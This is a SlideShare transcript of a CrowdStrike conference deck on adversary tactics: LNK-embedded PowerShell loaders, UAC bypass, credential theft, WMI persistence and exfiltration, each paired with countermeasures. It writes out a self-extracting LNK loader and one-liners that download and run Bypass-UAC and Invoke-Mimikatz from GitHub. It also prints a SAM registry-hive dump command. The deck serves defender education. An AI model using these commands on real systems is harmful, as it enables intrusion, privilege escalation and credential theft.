SlideShare a Scribd company logo
1 of 55
Download to read offline
SESSION	ID:SESSION	ID:
#RSAC
George	Kurtz
Hacking	Exposed:	The	Adversary	Oscars
EXP-W03
Co-Founder	&	President/CEO
CrowdStrike Inc.
@George_Kurtz
Dmitri	Alperovitch
Co-Founder	&	CTO
CrowdStrike Inc.
@DAlperovitch
Elia	Zaitsev
SR	Manager	
Solutions Architecture
CrowdStrike	Inc.
#RSAC
A B O UT 	 US
GEORGE KURTZ
In	security	for	20	+years
President	&	CEO,	CrowdStrike
Former	CTO,	McAfee
Former	CEO,	Foundstone
Co-Author,	Hacking	Exposed
#RSAC
A B O UT 	 US
DMITRI	ALPEROVITCH
Co-Founder	&	CTO,	CrowdStrike
Former	VP	Threat	Research,	McAfee
Author	of	Operation	Aurora,	
Night	Dragon,	Shady	RAT	reports
MIT	Tech	Review’s	Top	35	Innovator	
Under	35	for	2013
Foreign	Policy’s	Top	100	Leading	
Global	Thinkers	for	2013
#RSAC
A B O UT 	 US
ELIA	ZAITSEV
• Sr Manager,	Solutions	Architecture	,	
CrowdStrike
• Previously	at	IBM,	i2,	Northrop	Grumman
• Wrote	an	awesome	paper	on	great	white	
sharks	in	3rd grade
#RSAC
P OW E R 	 O F	 T H E 	 AC A D E M Y
#RSAC
THE	NOMINEES	ARE…
#RSAC
BEST	ACTOR	IN	A	LEADING	ROLE:	INITIAL	INFECTION
#RSAC
IN IT IA L 	 IN F EC T IO N : 	 B EA R 	 TAC T I C 	 – M A L I C I O US 	L NK
Embedded	PowerShell	+	Payload	inside	
Windows	Shortcut	file	(LNK)
Payload	can	be	encoded	PowerShell	scripts,	or	
multiple	stages	of	obfuscated	binary	code
Two	handy	Social	Engineering	features:
Windows	hides	LNK	extension	even	when	set	
to	show	extensions	
Can	set	icon	of	shortcut	file	to	associated	
productivity	app	(Adobe,	Office,	etc)
#RSAC
L NK 	FI L E 	CO M P O NE NTS
LNK	target	command
powershell.exe -windowstyle hidden	-command	
"$b=[System.IO.File]::ReadAllBytes('.spear.doc.lnk');
$l=[System.Text.Encoding]::ASCII.GetString($b,0xB30,0x414);
powershell.exe -windowstyle hidden	-enc $l”
Reads	self	and	extracts	b64	encoded	“loader”	script	from	
specific	offset	
Loader	is	located	after	body	of	shortcut;	makes	offsets	easier	to	calculate
256/260	character	limit	depending	on	OS	version
#RSAC
PowerShell	Loader
$bytes	=	[System.IO.File]::ReadAllBytes('spear.doc.lnk');
$lure	=	[System.Text.Encoding]::ASCII.GetString($bytes,	0xF50,	0x3B8C);
$payload	=	[System.Text.Encoding]::ASCII.GetString($bytes,	0x4AF0,	0x1A4);
$Content	=	[System.Convert]::FromBase64String($lure);
Set-Content	-Path	$env:templure.docx -Value	$Content	-Encoding	Byte;
Invoke-Item	$env:templure.docx;
powershell.exe -encodedCommand $payload
Similar	to	LNK	target;	read	self	and	extract	b64	encoded	Lure/Payload
L NK 	FI L E 	CO M P O NE NTS
#RSAC
Simple	PowerShell	payload	for	demonstration
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms
")		|	Out-null;	
[System.Windows.Forms.MessageBox]::Show("This	is	a	payload	executing")
Pop	a	message	box
Real	payload	example:
XOR	encoded	DLL	and	PNG	file
Decoded	DLL	is	executed
DLL	decrypts	IDAT	section	of	PNG	file,	modified	XTEA	algorithm,	
16byte	key	stored	in	DLL	data	section
L NK 	FI L E 	CO M P O NE NTS
#RSAC
Start	with	normal	LNK	shortcut	as	a	basis
Can	also	programmatically	craft	by	using	published	binary	format
Pad	LNK	target	command	with	blanks	up	to	256	characters	to	ensure	
fixed	size,	makes	calculating	offsets	easier
B64	encode	lure	document,	append	to	end	of	LNK	binary
B64	encode	payload,	append	lure
B64	encode	loader,	appended	after	payload
L NK 	FI L E 	CO NST R UC T I O N
#RSAC
S I M P L I F Y 	 W I T H 	 P Y T H O N !
#5-7	input	lnk file	name,	
lure	document,	and	
payload
#12	read	and	encode	
payload
#14-26	Calculate	size	and	
offset	for	lure	and	payload,	
construct	loader,	encode	
loader
L NK 	FI L E 	CO NST R UC T I O N
#RSAC
#28-90	LNK	file	“header”	
as	byte	array
Not	really	a	header	per	
say,	but	the	portions	
leading	up	to	the	LNK	
target	command	
S I M P L I F Y 	 W I T H 	 P Y T H O N !
L NK 	FI L E 	CO NST R UC T I O N
#RSAC
#92-103	Construct	LNK	target	
command	including	size	&	offset	
of	loader
#101	add	padding	up	to	256	
characters
#105-250	LNK	file	“footer”	as	
byte	array
Not	really	a	footer	per	say,	but	
the	portions	following	the	LNK	
target	command	
S I M P L I F Y 	 W I T H 	 P Y T H O N !
L NK 	FI L E 	CO NST R UC T I O N
#RSAC
#260	Append	encoded	
Lure,	Payload,	Loader	to	
end	of	file,	write	file	to	disk
Have	a	drink!
L NK 	FI L E 	CO NST R UC T I O N
S I M P L I F Y 	 W I T H 	 P Y T H O N !
#RSAC
DEMO
#RSAC
I N I T I A L 	 I N F E C T I O N : 	
P A N D A 	 T A C T I C 	 – M A C R O 	 D O C U M E N T
PowerShell	payload	inside	Office	doc	VBA	macro
Payload	can	be	encoded	PowerShell	scripts,	or	multiple	stages	of	obfuscated	binary	code
No	exploitation	required,	but	does	require	macros	to	be	enabled	and/or	user	must	allow	
macro	to	run
#RSAC
DEMO
#RSAC
Force	Windows	to	show	LNK	extension
Delete	NeverShowExt registry	value	under	HKEY_CLASSES_ROOTlnkfile
Block	Office	macros
CO UNT E R M EA S UR ES
#RSAC
BEST	PRIVILEGE	ESCALATION	IN	A	SUPPORTING	ROLE
#RSAC
P R IV IL EG E 	ES CA L AT IO N: 	 B EA R 	 TAC T I C 	– UAC M E 	 # 2 3
One	of	the	UAC	defeat	techniques	that	leverages	Windows	AutoElevate Backdoor
https://github.com/hfiref0x/UACME
Targets	pkgmgr.exe and	hijacks	loading	of	DismCore.dll
Implemented	via	PowerShell	as	well
powershell "IEX	(New-Object	
Net.WebClient).DownloadString('https://raw.githubusercontent.com/FuzzySecurity/
PowerShell-Suite/master/Bypass-UAC/Bypass-UAC.ps1');	Bypass-UAC	
ucmDismMethod"	
Works	on	x64	Win7	through	Win	10	Creator’s	Update,	Build	15031.
#RSAC
H IG H 	 L E V E L 	 E X P L A N AT IO N : 	 US M D I S M M E T H O D 	
PowerShell	impersonates	explorer.exe
After	impersonation,	use	IFileOperation::CopyItem COM	calls	to	drop	
hijack/proxy	dll into	system32	as	DismCore.dll
Utilizing	IFileOperation gives	us	a	backdoor	to	copy	into	system32	without	UAC
Call	PkgMgr.exe
Legacy	Package	manager,	whitelisted	by	MS	against	UAC
PkgMgr.exe executes	dism.exe
Dism.exe not	whitelisted	but	doesn’t	matter	since	parent	is	already	elevated	
Dism.exe attempts	to	load	DismCore.dll,	which	is	what	we	hijack
#RSAC
DEMO
#RSAC
P R IV IL EG E 	ES CA L AT IO N: 	 PA NDA 	TAC T I C 	 – K E R NE L 	0 - DAY
0-day	64-bit	Kernel	exploit
CVE-2014-4113	– Vulnerability	in	Win32k.sys
First	used	by	Hurricane	Panda,	discovered	by	CrowdStrike
https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-
escalation-exploit-cve-2014-4113-hurricane-panda/
Originally	deployed	as	an	executable,	can	be	implemented	in	PowerShell	as	well
https://github.com/subTee/CVE-2014-4113/blob/master/Invoke-SystemShell.ps1
Also	has	a	metasploit module
I	demoed	this	live	at	RSA	2015	(PowerShell	version)
https://www.rsaconference.com/events/us15/agenda/sessions/1815/hacking-exposed-
beyond-the-malware
#RSAC
UACME	#23
Configure	UAC	to	
always	notify
Stop	using	admin	
accounts	everywhere	
for	#@$%-sake!	
CVE-2014-4113
Patch	Windows
Upgrade	Windows
Yara rule	 à
CO UNT E R M EA S UR ES
#RSAC
BEST	CREDENTIAL	THEFT SCORE
#RSAC
C R E DE N T IA L 	 T H E F T: 	 B EA R 	 & 	 PA NDA 	– I T ’S 	A 	T I E !
This	is	one	stage	where	we	see	lots	of	overlap	between	actors
Widespread	use	of	PowerShell	(Invoke-Mimikatz,	PowerSploit,	Invoke-
ReflectivePEInjection)
powershell "IEX	(New-Object	
Net.WebClient).DownloadString('https://raw.githubusercontent.com/
mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');	
Invoke-Mimikatz;	exit"
Saving	Registry	hives
C:WindowsSystem32reg.exe save	HKLMsam C:1.tmp
#RSAC
Upgrade	to	Windows	10
Credential	Guard
— Only	protects	Domain	Credentials	
Monitor/restrict	PowerShell	usage
Win	10	/w	Device	Guard	&	Script	policies	can	disable	unsigned	scripts	that	use	
reflection
— Can	be	bypassed	if	older	versions	of	PS	are	allowed	to	run
CO UNT E R M EA S UR ES
#RSAC
BEST	PERSISTENCE	IN	A	SILENT	BREACH
#RSAC
P E RS IST E NCE : 	B EA R 	 TAC T I C 	– W M I 	 E V E NT 	 S UB S C R I PT I O N
Three	Components
Event	Filter	is	triggered	on	action(s)
— Dozens	of	options	such	as	User	logs	in,	System	boots,	timer,	etc
Consumer	binds	to	Event	filter	and	executes	command	when	triggered
Command	is	a	b64	PowerShell	payload	stored	inside	a	custom	WMI	class
— Encoded	binary	payloads	can	be	hidden	inside	WMI	repository	and	avoid	touching	
disk
Can	be	implemented	with	various	tools	such	as	wmic.exe and	third	party	tools,	but	
PowerShell	is	the	most	common
Can	be	done	remotely	as	well	using	DCOM	or	WinRM
#RSAC
W M I 	 E V E NT 	 S UB S C R I PT I O N	 B R EA K D OW N
C U S TO M 	 C L A S S
#1	Store	class	in	
rootcmiv2
#2	Create	custom	class	
“HackingExposed_Class”
#4	Payload	written	to	
class	property	called	
“Payload”,	executes	
calc.exe
#RSAC
E V E N T 	 F I LT E R
#7	Filter	named	
“Hacking	Exposed	Filter”
#9-10	WQL	query	
defines	event	to	
trigger	on
#12-14	Registers	event
W M I 	 E V E NT 	 S UB S C R I PT I O N	 B R EA K D OW N
#RSAC
E V E N T 	 C O N S U M E R
#16	Consumer	named	
“HackingExposedConsumer”
#18	Executing	Powershell
#20-22	Powershell argument	reads	
the	’Payload’	property	from	the	
“HackingExposed_Class”
#24	Combine	path	+	args
#26-28	Register	consumer
W M I 	 E V E NT 	 S UB S C R I PT I O N	 B R EA K D OW N
#RSAC
Bind	the	event	filter	to	consumer
W M I 	 E V E NT 	 S UB S C R I PT I O N	 B R EA K D OW N
#RSAC
P E RS IST E NCE : 	PA NDA 	TAC T I C 	 – S E RV I C E D L L
Similar	to	a	service	EXE,	except	runs	under	svchost
Creation	of	a	service	DLL	is	undocumented
Adversary	can	build	from	scratch,	or	hijack	a	legitimate	service	DLL,	we	will	do	
the	latter
Legitimate	DLL	is	hardcoded	to	execute	a	particular	binary
Replace	target	binary	with	payload
Service	is	created	via	registry	keys	and	applied	on	reboot
#RSAC
R EG I ST E R I NG 	 T H E 	 S E RV I C E
Execute	reg file
#RSAC
Innocuous	Description,	and	
Display	name
Execute	as	LocalSystem
ImagePath points	to	svchost;	can	run	
under	existing	or	new	group	
Stealth	vs	Stability
Start=2	means	autostart
ServiceDLL points	to	dll path
R EG I ST E R I NG 	 T H E 	 S E RV I C E
#RSAC
DEMO
#RSAC
User	PowerShell	to	list	WMI	Filters/Consumers/Binders
Get-WmiObject -Class	[__EventFilter |	__EventConsumer |	
__FilterToConsumerBinding] –NameSpace rootsubscription	
Log	WMI	activities
Event	logs
Create	WMI	event	filter	to	monitor	for	new	WMI	event	filters
Disable	WMI	
CO UNT E R M EA S UR ES
#RSAC
Robust	EDR	solutions	can	track	WMI	creation,	execution,	Service	
creation,	ASEP	modifications,	etc
CO UNT E R M EA S UR ES
#RSAC
Robust	EDR	
solutions	can	track	
WMI	creation,	
execution,	Service	
creation,	
ASEP	
modifications,	etc
CO UNT E R M EA S UR ES
#RSAC
BEST	EXFILTRATION	IN	A	SHORT	FORMAT
#RSAC
E X F ILT R AT IO N: 	 B EA R 	 TAC T I C 	 – M A K EC A B 	+ 	O NE D R I V E 	
Really	two	different	sub-techniques	
used	in	concert
MakeCAB - for	archiving	and	
compressing	target	files
— Comes	built-in	since	WinXP!	No	
need	to	schlep	external	tools
— Does	not	encrypt	data	
(un)fortunately
OneDrive	– Mounted	as	network	share
Bonus:	SSL	encryption!
Blends	with	normal	enterprise	traffic
#RSAC
DEMO
#RSAC
E X F ILT R AT IO N : 	PA NDA 	TAC T I C 	 – D I S G UI S E D 	 R A R
Uses	RAR	command	line	tool	
for	packaging	and	encryption	
of	exfil data
Often	renamed	to	another	
file	for	minor	obfuscation
Sometimes	packed/hash	
modified
#RSAC
DEMO
#RSAC
Distinctive	command	line	arguments	used	for	RAR,	can	be	hunting	lead	
for	EDR	tools
Can	also	monitor	for	CAB/RAR	file	creation	(particularly	on	Servers)
CO UNT E R M EA S UR ES
#RSAC
BEST	DRAMA
#RSAC
#RSAC
BEST	FEMALE	SUPPORTING	ACTOR	IN	FOREIGN	BREACH
#RSAC
FANCY	BEAR
#RSAC
LIFETIME	ACHIEVEMENT	AWARD
#RSAC
MIMIKATZ
#RSAC
THANK	YOU!
HOW	TO	REACH	US:	
TWITTER:	@GEORGE_KURTZ	&	@DALPEROVITCH
FOR	MORE	INFORMATION	&	TO	DOWNLOAD	SLIDES:	
BLOG.CROWDSTRIKE.COM
CrowdInspect Update	– THANK	YOU	VirusTotal!
LEARN	MORE	ABOUT	NEXT-GENERATION	ENDPOINT	PROTECTION
LEARN	ABOUT	CROWDSTRIKE	FALCON:	WWW.CROWDSTRIKE.COM/PRODUCTS
REQUEST	A	DEMO:	WWW.CROWDSTRIKE.COM/REQUEST-A-DEMO/	
COME	MEET	US:
BOOTH	2345	SOUTH	HALL

More Related Content

What's hot

Paolo Passeri - A Multi Layered Approach to Threat Intelligence
Paolo Passeri - A Multi Layered Approach to Threat IntelligencePaolo Passeri - A Multi Layered Approach to Threat Intelligence
Paolo Passeri - A Multi Layered Approach to Threat IntelligenceCodemotion
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
Learning by hacking - android application hacking tutorial
Learning by hacking - android application hacking tutorialLearning by hacking - android application hacking tutorial
Learning by hacking - android application hacking tutorialLandice Fu
 
James Forshaw, elevator action
James Forshaw, elevator actionJames Forshaw, elevator action
James Forshaw, elevator actionPacSecJP
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedThomas Roccia
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk   potentially malicious ur ls(130216) #fitalk   potentially malicious ur ls
(130216) #fitalk potentially malicious ur lsINSIGHT FORENSIC
 
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCasey Ellis
 
Fighting malware - keeping your Intellectual Property safe
Fighting malware -  keeping your Intellectual Property safeFighting malware -  keeping your Intellectual Property safe
Fighting malware - keeping your Intellectual Property safePrayukth K V
 
The Joy of Sandbox Mitigations
The Joy of Sandbox MitigationsThe Joy of Sandbox Mitigations
The Joy of Sandbox MitigationsJames Forshaw
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies:  Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies:  Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoShakacon
 

What's hot (10)

Paolo Passeri - A Multi Layered Approach to Threat Intelligence
Paolo Passeri - A Multi Layered Approach to Threat IntelligencePaolo Passeri - A Multi Layered Approach to Threat Intelligence
Paolo Passeri - A Multi Layered Approach to Threat Intelligence
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
Learning by hacking - android application hacking tutorial
Learning by hacking - android application hacking tutorialLearning by hacking - android application hacking tutorial
Learning by hacking - android application hacking tutorial
 
James Forshaw, elevator action
James Forshaw, elevator actionJames Forshaw, elevator action
James Forshaw, elevator action
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons Learned
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk   potentially malicious ur ls(130216) #fitalk   potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
 
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
 
Fighting malware - keeping your Intellectual Property safe
Fighting malware -  keeping your Intellectual Property safeFighting malware -  keeping your Intellectual Property safe
Fighting malware - keeping your Intellectual Property safe
 
The Joy of Sandbox Mitigations
The Joy of Sandbox MitigationsThe Joy of Sandbox Mitigations
The Joy of Sandbox Mitigations
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies:  Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies:  Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
 

Similar to Hacking exposed : The adversary Oscars

Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest Haydn Johnson
 
Drupal Camp Atlanta 2011 - Drupal Security
Drupal Camp Atlanta 2011 - Drupal SecurityDrupal Camp Atlanta 2011 - Drupal Security
Drupal Camp Atlanta 2011 - Drupal SecurityMediacurrent
 
Automotive Cybersecurity: Test Like a Hacker
Automotive Cybersecurity: Test Like a HackerAutomotive Cybersecurity: Test Like a Hacker
Automotive Cybersecurity: Test Like a HackerForAllSecure
 
Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”Priyanka Aash
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwarePriyanka Aash
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsPriyanka Aash
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextPriyanka Aash
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextPriyanka Aash
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosOuthai SAIOUDOM
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligencePriyanka Aash
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Deep dive nella supply chain della nostra infrastruttura cloud
Deep dive nella supply chain della nostra infrastruttura cloudDeep dive nella supply chain della nostra infrastruttura cloud
Deep dive nella supply chain della nostra infrastruttura cloudsparkfabrik
 
Adversary tactics config mgmt-&-logs-oh-my
Adversary tactics config mgmt-&-logs-oh-myAdversary tactics config mgmt-&-logs-oh-my
Adversary tactics config mgmt-&-logs-oh-myJesse Moore
 

Similar to Hacking exposed : The adversary Oscars (20)

Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
Drupal Camp Atlanta 2011 - Drupal Security
Drupal Camp Atlanta 2011 - Drupal SecurityDrupal Camp Atlanta 2011 - Drupal Security
Drupal Camp Atlanta 2011 - Drupal Security
 
Automotive Cybersecurity: Test Like a Hacker
Automotive Cybersecurity: Test Like a HackerAutomotive Cybersecurity: Test Like a Hacker
Automotive Cybersecurity: Test Like a Hacker
 
Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adware
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laos
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
The Pivot
The PivotThe Pivot
The Pivot
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Deep dive nella supply chain della nostra infrastruttura cloud
Deep dive nella supply chain della nostra infrastruttura cloudDeep dive nella supply chain della nostra infrastruttura cloud
Deep dive nella supply chain della nostra infrastruttura cloud
 
Adversary tactics config mgmt-&-logs-oh-my
Adversary tactics config mgmt-&-logs-oh-myAdversary tactics config mgmt-&-logs-oh-my
Adversary tactics config mgmt-&-logs-oh-my
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
